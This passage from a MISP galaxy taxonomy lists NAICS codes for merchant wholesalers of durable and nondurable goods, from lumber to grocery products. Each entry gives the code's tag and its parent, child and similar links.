Lumber, Plywood, Millwork, and Wood Panel Merchant Wholesalers

The tag is: misp-galaxy:naics="423310"

423310 has relationships with:

  • child-of: misp-galaxy:naics="4233" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42331" with estimative-language:likelihood-probability="likely"

42332

Brick, Stone, and Related Construction Material Merchant Wholesalers

The tag is: misp-galaxy:naics="42332"

42332 has relationships with:

  • child-of: misp-galaxy:naics="4233" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423320" with estimative-language:likelihood-probability="likely"

423320

Brick, Stone, and Related Construction Material Merchant Wholesalers

The tag is: misp-galaxy:naics="423320"

423320 has relationships with:

  • child-of: misp-galaxy:naics="4233" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42332" with estimative-language:likelihood-probability="likely"

42333

Roofing, Siding, and Insulation Material Merchant Wholesalers

The tag is: misp-galaxy:naics="42333"

42333 has relationships with:

  • child-of: misp-galaxy:naics="4233" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423330" with estimative-language:likelihood-probability="likely"

423330

Roofing, Siding, and Insulation Material Merchant Wholesalers

The tag is: misp-galaxy:naics="423330"

423330 has relationships with:

  • child-of: misp-galaxy:naics="4233" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42333" with estimative-language:likelihood-probability="likely"

42339

Other Construction Material Merchant Wholesalers

The tag is: misp-galaxy:naics="42339"

42339 has relationships with:

  • child-of: misp-galaxy:naics="4233" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423390" with estimative-language:likelihood-probability="likely"

423390

Other Construction Material Merchant Wholesalers

The tag is: misp-galaxy:naics="423390"

423390 has relationships with:

  • child-of: misp-galaxy:naics="4233" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42339" with estimative-language:likelihood-probability="likely"

4234

Professional and Commercial Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="4234"

4234 has relationships with:

  • child-of: misp-galaxy:naics="423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42341" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42342" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423420" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42343" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423430" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42344" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423440" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42345" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423450" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42346" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423460" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42349" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423490" with estimative-language:likelihood-probability="likely"

42341

Photographic Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42341"

42341 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423410" with estimative-language:likelihood-probability="likely"

423410

Photographic Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="423410"

423410 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42341" with estimative-language:likelihood-probability="likely"

42342

Office Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="42342"

42342 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423420" with estimative-language:likelihood-probability="likely"

423420

Office Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="423420"

423420 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42342" with estimative-language:likelihood-probability="likely"

42343

Computer and Computer Peripheral Equipment and Software Merchant Wholesalers

The tag is: misp-galaxy:naics="42343"

42343 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423430" with estimative-language:likelihood-probability="likely"

423430

Computer and Computer Peripheral Equipment and Software Merchant Wholesalers

The tag is: misp-galaxy:naics="423430"

423430 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42343" with estimative-language:likelihood-probability="likely"

42344

Other Commercial Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="42344"

42344 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423440" with estimative-language:likelihood-probability="likely"

423440

Other Commercial Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="423440"

423440 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42344" with estimative-language:likelihood-probability="likely"

42345

Medical, Dental, and Hospital Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42345"

42345 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423450" with estimative-language:likelihood-probability="likely"

423450

Medical, Dental, and Hospital Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="423450"

423450 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42345" with estimative-language:likelihood-probability="likely"

42346

Ophthalmic Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="42346"

42346 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423460" with estimative-language:likelihood-probability="likely"

423460

Ophthalmic Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="423460"

423460 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42346" with estimative-language:likelihood-probability="likely"

42349

Other Professional Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42349"

42349 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423490" with estimative-language:likelihood-probability="likely"

423490

Other Professional Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="423490"

423490 has relationships with:

  • child-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42349" with estimative-language:likelihood-probability="likely"

4235

Metal and Mineral (except Petroleum) Merchant Wholesalers

The tag is: misp-galaxy:naics="4235"

4235 has relationships with:

  • child-of: misp-galaxy:naics="423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42351" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423510" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42352" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423520" with estimative-language:likelihood-probability="likely"

42351

Metal Service Centers and Other Metal Merchant Wholesalers

The tag is: misp-galaxy:naics="42351"

42351 has relationships with:

  • child-of: misp-galaxy:naics="4235" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423510" with estimative-language:likelihood-probability="likely"

423510

Metal Service Centers and Other Metal Merchant Wholesalers

The tag is: misp-galaxy:naics="423510"

423510 has relationships with:

  • child-of: misp-galaxy:naics="4235" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42351" with estimative-language:likelihood-probability="likely"

42352

Coal and Other Mineral and Ore Merchant Wholesalers

The tag is: misp-galaxy:naics="42352"

42352 has relationships with:

  • child-of: misp-galaxy:naics="4235" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423520" with estimative-language:likelihood-probability="likely"

423520

Coal and Other Mineral and Ore Merchant Wholesalers

The tag is: misp-galaxy:naics="423520"

423520 has relationships with:

  • child-of: misp-galaxy:naics="4235" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42352" with estimative-language:likelihood-probability="likely"

4236

Household Appliances and Electrical and Electronic Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="4236"

4236 has relationships with:

  • child-of: misp-galaxy:naics="423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42361" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423610" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42362" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423620" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42369" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423690" with estimative-language:likelihood-probability="likely"

42361

Electrical Apparatus and Equipment, Wiring Supplies, and Related Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="42361"

42361 has relationships with:

  • child-of: misp-galaxy:naics="4236" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423610" with estimative-language:likelihood-probability="likely"

423610

Electrical Apparatus and Equipment, Wiring Supplies, and Related Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="423610"

423610 has relationships with:

  • child-of: misp-galaxy:naics="4236" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42361" with estimative-language:likelihood-probability="likely"

42362

Household Appliances, Electric Housewares, and Consumer Electronics Merchant Wholesalers

The tag is: misp-galaxy:naics="42362"

42362 has relationships with:

  • child-of: misp-galaxy:naics="4236" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423620" with estimative-language:likelihood-probability="likely"

423620

Household Appliances, Electric Housewares, and Consumer Electronics Merchant Wholesalers

The tag is: misp-galaxy:naics="423620"

423620 has relationships with:

  • child-of: misp-galaxy:naics="4236" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42362" with estimative-language:likelihood-probability="likely"

42369

Other Electronic Parts and Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="42369"

42369 has relationships with:

  • child-of: misp-galaxy:naics="4236" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423690" with estimative-language:likelihood-probability="likely"

423690

Other Electronic Parts and Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="423690"

423690 has relationships with:

  • child-of: misp-galaxy:naics="4236" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42369" with estimative-language:likelihood-probability="likely"

4237

Hardware, and Plumbing and Heating Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="4237"

4237 has relationships with:

  • child-of: misp-galaxy:naics="423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42371" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423710" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42372" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423720" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42373" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423730" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42374" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423740" with estimative-language:likelihood-probability="likely"

42371

Hardware Merchant Wholesalers

The tag is: misp-galaxy:naics="42371"

42371 has relationships with:

  • child-of: misp-galaxy:naics="4237" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423710" with estimative-language:likelihood-probability="likely"

423710

Hardware Merchant Wholesalers

The tag is: misp-galaxy:naics="423710"

423710 has relationships with:

  • child-of: misp-galaxy:naics="4237" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42371" with estimative-language:likelihood-probability="likely"

42372

Plumbing and Heating Equipment and Supplies (Hydronics) Merchant Wholesalers

The tag is: misp-galaxy:naics="42372"

42372 has relationships with:

  • child-of: misp-galaxy:naics="4237" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423720" with estimative-language:likelihood-probability="likely"

423720

Plumbing and Heating Equipment and Supplies (Hydronics) Merchant Wholesalers

The tag is: misp-galaxy:naics="423720"

423720 has relationships with:

  • child-of: misp-galaxy:naics="4237" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42372" with estimative-language:likelihood-probability="likely"

42373

Warm Air Heating and Air-Conditioning Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42373"

42373 has relationships with:

  • child-of: misp-galaxy:naics="4237" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423730" with estimative-language:likelihood-probability="likely"

423730

Warm Air Heating and Air-Conditioning Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="423730"

423730 has relationships with:

  • child-of: misp-galaxy:naics="4237" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42373" with estimative-language:likelihood-probability="likely"

42374

Refrigeration Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42374"

42374 has relationships with:

  • child-of: misp-galaxy:naics="4237" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423740" with estimative-language:likelihood-probability="likely"

423740

Refrigeration Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="423740"

423740 has relationships with:

  • child-of: misp-galaxy:naics="4237" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42374" with estimative-language:likelihood-probability="likely"

4238

Machinery, Equipment, and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="4238"

4238 has relationships with:

  • child-of: misp-galaxy:naics="423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42381" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423810" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42382" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423820" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42383" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423830" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42384" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423840" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42385" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423850" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42386" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423860" with estimative-language:likelihood-probability="likely"

42381

Construction and Mining (except Oil Well) Machinery and Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="42381"

42381 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423810" with estimative-language:likelihood-probability="likely"

423810

Construction and Mining (except Oil Well) Machinery and Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="423810"

423810 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42381" with estimative-language:likelihood-probability="likely"

42382

Farm and Garden Machinery and Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="42382"

42382 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423820" with estimative-language:likelihood-probability="likely"

423820

Farm and Garden Machinery and Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="423820"

423820 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42382" with estimative-language:likelihood-probability="likely"

42383

Industrial Machinery and Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="42383"

42383 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423830" with estimative-language:likelihood-probability="likely"

423830

Industrial Machinery and Equipment Merchant Wholesalers

The tag is: misp-galaxy:naics="423830"

423830 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42383" with estimative-language:likelihood-probability="likely"

42384

Industrial Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42384"

42384 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423840" with estimative-language:likelihood-probability="likely"

423840

Industrial Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="423840"

423840 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42384" with estimative-language:likelihood-probability="likely"

42385

Service Establishment Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42385"

42385 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423850" with estimative-language:likelihood-probability="likely"

423850

Service Establishment Equipment and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="423850"

423850 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42385" with estimative-language:likelihood-probability="likely"

42386

Transportation Equipment and Supplies (except Motor Vehicle) Merchant Wholesalers

The tag is: misp-galaxy:naics="42386"

42386 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423860" with estimative-language:likelihood-probability="likely"

423860

Transportation Equipment and Supplies (except Motor Vehicle) Merchant Wholesalers

The tag is: misp-galaxy:naics="423860"

423860 has relationships with:

  • child-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42386" with estimative-language:likelihood-probability="likely"

4239

Miscellaneous Durable Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="4239"

4239 has relationships with:

  • child-of: misp-galaxy:naics="423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42391" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42392" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42393" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42394" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423940" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42399" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423990" with estimative-language:likelihood-probability="likely"

42391

Sporting and Recreational Goods and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42391"

42391 has relationships with:

  • child-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423910" with estimative-language:likelihood-probability="likely"

423910

Sporting and Recreational Goods and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="423910"

423910 has relationships with:

  • child-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42391" with estimative-language:likelihood-probability="likely"

42392

Toy and Hobby Goods and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42392"

42392 has relationships with:

  • child-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423920" with estimative-language:likelihood-probability="likely"

423920

Toy and Hobby Goods and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="423920"

423920 has relationships with:

  • child-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42392" with estimative-language:likelihood-probability="likely"

42393

Recyclable Material Merchant Wholesalers

The tag is: misp-galaxy:naics="42393"

42393 has relationships with:

  • child-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423930" with estimative-language:likelihood-probability="likely"

423930

Recyclable Material Merchant Wholesalers

The tag is: misp-galaxy:naics="423930"

423930 has relationships with:

  • child-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42393" with estimative-language:likelihood-probability="likely"

42394

Jewelry, Watch, Precious Stone, and Precious Metal Merchant Wholesalers

The tag is: misp-galaxy:naics="42394"

42394 has relationships with:

  • child-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423940" with estimative-language:likelihood-probability="likely"

423940

Jewelry, Watch, Precious Stone, and Precious Metal Merchant Wholesalers

The tag is: misp-galaxy:naics="423940"

423940 has relationships with:

  • child-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42394" with estimative-language:likelihood-probability="likely"

42399

Other Miscellaneous Durable Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="42399"

42399 has relationships with:

  • child-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423990" with estimative-language:likelihood-probability="likely"

423990

Other Miscellaneous Durable Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="423990"

423990 has relationships with:

  • child-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42399" with estimative-language:likelihood-probability="likely"

424

Merchant Wholesalers, Nondurable Goods

The tag is: misp-galaxy:naics="424"

424 has relationships with:

  • child-of: misp-galaxy:naics="42" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4241" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4242" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4243" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4244" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4245" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4246" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4247" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4248" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4249" with estimative-language:likelihood-probability="likely"

4241

Paper and Paper Product Merchant Wholesalers

The tag is: misp-galaxy:naics="4241"

4241 has relationships with:

  • child-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42413" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424130" with estimative-language:likelihood-probability="likely"

42411

Printing and Writing Paper Merchant Wholesalers

The tag is: misp-galaxy:naics="42411"

42411 has relationships with:

  • child-of: misp-galaxy:naics="4241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424110" with estimative-language:likelihood-probability="likely"

424110

Printing and Writing Paper Merchant Wholesalers

The tag is: misp-galaxy:naics="424110"

424110 has relationships with:

  • child-of: misp-galaxy:naics="4241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42411" with estimative-language:likelihood-probability="likely"

42412

Stationery and Office Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="42412"

42412 has relationships with:

  • child-of: misp-galaxy:naics="4241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424120" with estimative-language:likelihood-probability="likely"

424120

Stationery and Office Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="424120"

424120 has relationships with:

  • child-of: misp-galaxy:naics="4241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42412" with estimative-language:likelihood-probability="likely"

42413

Industrial and Personal Service Paper Merchant Wholesalers

The tag is: misp-galaxy:naics="42413"

42413 has relationships with:

  • child-of: misp-galaxy:naics="4241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424130" with estimative-language:likelihood-probability="likely"

424130

Industrial and Personal Service Paper Merchant Wholesalers

The tag is: misp-galaxy:naics="424130"

424130 has relationships with:

  • child-of: misp-galaxy:naics="4241" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42413" with estimative-language:likelihood-probability="likely"

4242

Drugs and Druggists' Sundries Merchant Wholesalers

The tag is: misp-galaxy:naics="4242"

4242 has relationships with:

  • child-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42421" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424210" with estimative-language:likelihood-probability="likely"

42421

Drugs and Druggists' Sundries Merchant Wholesalers

The tag is: misp-galaxy:naics="42421"

42421 has relationships with:

  • child-of: misp-galaxy:naics="4242" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424210" with estimative-language:likelihood-probability="likely"

424210

Drugs and Druggists' Sundries Merchant Wholesalers

The tag is: misp-galaxy:naics="424210"

424210 has relationships with:

  • child-of: misp-galaxy:naics="4242" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42421" with estimative-language:likelihood-probability="likely"

4243

Apparel, Piece Goods, and Notions Merchant Wholesalers

The tag is: misp-galaxy:naics="4243"

4243 has relationships with:

  • child-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42431" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42434" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424340" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42435" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424350" with estimative-language:likelihood-probability="likely"

42431

Piece Goods, Notions, and Other Dry Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="42431"

42431 has relationships with:

  • child-of: misp-galaxy:naics="4243" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424310" with estimative-language:likelihood-probability="likely"

424310

Piece Goods, Notions, and Other Dry Goods Merchant Wholesalers

The tag is: misp-galaxy:naics="424310"

424310 has relationships with:

  • child-of: misp-galaxy:naics="4243" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42431" with estimative-language:likelihood-probability="likely"

42434

Footwear Merchant Wholesalers

The tag is: misp-galaxy:naics="42434"

42434 has relationships with:

  • child-of: misp-galaxy:naics="4243" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424340" with estimative-language:likelihood-probability="likely"

424340

Footwear Merchant Wholesalers

The tag is: misp-galaxy:naics="424340"

424340 has relationships with:

  • child-of: misp-galaxy:naics="4243" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42434" with estimative-language:likelihood-probability="likely"

42435

Clothing and Clothing Accessories Merchant Wholesalers

The tag is: misp-galaxy:naics="42435"

42435 has relationships with:

  • child-of: misp-galaxy:naics="4243" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="424350" with estimative-language:likelihood-probability="likely"

424350

Clothing and Clothing Accessories Merchant Wholesalers

The tag is: misp-galaxy:naics="424350"

424350 has relationships with:

  • child-of: misp-galaxy:naics="4243" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42435" with estimative-language:likelihood-probability="likely"

4244

Grocery and Related Product Merchant Wholesalers

The tag is: misp-galaxy:naics="4244"

4244 has relationships with:

  • child-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42441" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42442" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424420" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42443" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424430" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42444" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424440" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42445" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424450" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42446" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424460" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42447" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424470" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42448" with estimative-language:likelihood-probability="likely"

